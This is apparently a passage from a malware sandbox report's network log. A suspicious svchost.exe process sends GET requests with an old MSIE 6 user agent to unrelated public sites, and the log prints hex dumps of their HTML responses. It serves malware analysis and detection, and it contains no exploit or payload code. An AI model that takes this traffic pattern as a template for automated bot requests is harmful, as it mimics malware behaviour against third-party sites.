63	192.168.2.5	22763	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:35 UTC	1074	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:35 UTC	1083	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:35 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:35 UTC	1084	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.5	23522	91.229.22.126	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:35 UTC	1084	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: pleszew.policja.gov.pl
2023-03-22 04:45:35 UTC	1085	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:46:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2023-03-22 04:45:35 UTC	1085	IN	Data Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65 Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
2023-03-22 04:45:36 UTC	1101	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
2023-03-22 04:45:36 UTC	1117	IN	Data Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
2023-03-22 04:45:36 UTC	1133	IN	Data Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.5	24097	104.21.66.220	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:36 UTC	1133	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: clinicasanluis.com.co
2023-03-22 04:45:36 UTC	1133	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 17 Aug 2005 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: d55e479f054c94814cbc10d217aaa990=ccab68a15823756cf406ae277e3a28c3; path=/; HttpOnly Last-Modified: Wed, 22 Mar 2023 04:45:36 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=duzl3flaO0hzWOQRfqy7vBDuMYl45bF9skdLiEKM92vpERpWW43twb7eQgJh94%2Fe8nBB%2BtXEuOsR%2F6p1uXJCQy%2FPVzZ%2B9y%2B9EZGwZXZ69Ulsq%2F8cNIHeC8jSL7CNuX6zvP21Mwn%2BcDM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc93d1b1e2c16-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:36 UTC	1134	IN	Data Raw: 37 63 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20 Data Ascii: 7c46<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
2023-03-22 04:45:36 UTC	1135	IN	Data Raw: 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 Data Ascii: e><link href="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><li
2023-03-22 04:45:36 UTC	1136	IN	Data Raw: 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 Data Ascii: t src="/media/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></scrip
2023-03-22 04:45:36 UTC	1137	IN	Data Raw: 35 2f 61 73 73 65 74 73 2f 6a 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 Data Ascii: 5/assets/js/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></scr
2023-03-22 04:45:36 UTC	1139	IN	Data Raw: 73 2f 6e 75 65 73 74 72 61 5f 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 Data Ascii: s/nuestra_clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g
2023-03-22 04:45:36 UTC	1140	IN	Data Raw: 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e Data Ascii: s="g-menu-item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span
2023-03-22 04:45:36 UTC	1141	IN	Data Raw: 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 Data Ascii: an class="g-menu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-ite
2023-03-22 04:45:36 UTC	1143	IN	Data Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 Data Ascii: /index.php/nuestra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="
2023-03-22 04:45:36 UTC	1144	IN	Data Raw: 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 Data Ascii: class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul cla
2023-03-22 04:45:36 UTC	1145	IN	Data Raw: 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 Data Ascii: li><li class="g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span cla
2023-03-22 04:45:36 UTC	1147	IN	Data Raw: 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f Data Ascii: tem-content"><span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-co
2023-03-22 04:45:36 UTC	1148	IN	Data Raw: 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 Data Ascii: ss="g-menu-item-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-me
2023-03-22 04:45:36 UTC	1149	IN	Data Raw: 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 Data Ascii: /span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" 